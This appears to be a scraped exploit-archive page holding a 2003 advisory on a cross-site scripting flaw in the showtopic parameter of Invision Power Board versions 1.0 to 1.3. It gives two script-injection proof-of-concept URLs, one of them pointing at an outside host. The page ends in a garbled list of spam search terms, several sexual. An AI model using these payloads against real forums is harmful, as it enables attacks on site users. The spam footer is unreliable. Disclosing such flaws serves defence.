exploits , vulnerabilities , articles , Invision Power Board Index.php Showtopic Cross-Site Scripting Vulnerability
| Title |
Invision Power Board Index.php Showtopic Cross-Site Scripting Vulnerability |
| Published |
2003-09-09-12:00AM |
| Updated |
2004-03-01-03:46PM |
| Class |
Input Validation Error |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
The disclosure of this issue has been credited to Boy Bear <eyal067@walla.co.il>. |
| Vulnerable |
Invision Power Services Invision Board 1.3 Final
Invision Power Services Invision Board 1.3
Invision Power Services Invision Board 1.2
Invision Power Services Invision Board 1.1.2
Invision Power Services Invision Board 1.1.1
Invision Power Services Invision Board 1.0.1
Invision Power Services Invision Board 1.0 |
| Not Vulnerable |
|
| Code |
The following proof of concept was provided:
http://www.example.com/index.php?showtopic='><script>window.open
(window.location.search.substring(79))
</script>http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision
http://www.example.com/?showtopic='><script>alert(window.document.url)</script><plaintext>
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Fri, 21 Nov 2008 06:09:34 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Wap sixy c isc www.rex.cn ...t/comp sexyartica free sexy WWW.Sex 30 Flem vidio mobile sex sexy vedio zooxxx Nigga vid ranimukerj hot+auntys Sridevi na addguest.h Windows Li Www.xnx.co Sanias boa webser www.gypsys yuoporm.co t765t bro Cubecart www89 www.sexyta Pictures Www.123cli ms06-04 freesexycl family sex xxxvedio.c yuoporm.co www.sexyta IP.Board 2 Microsoft www.hotelh ayesa taki avs dvd to hotmuvi applicantd apacha 2.0 Sex vedeio egroup war bollywood appache ht xxxyangom MAIL sexsex.com
|
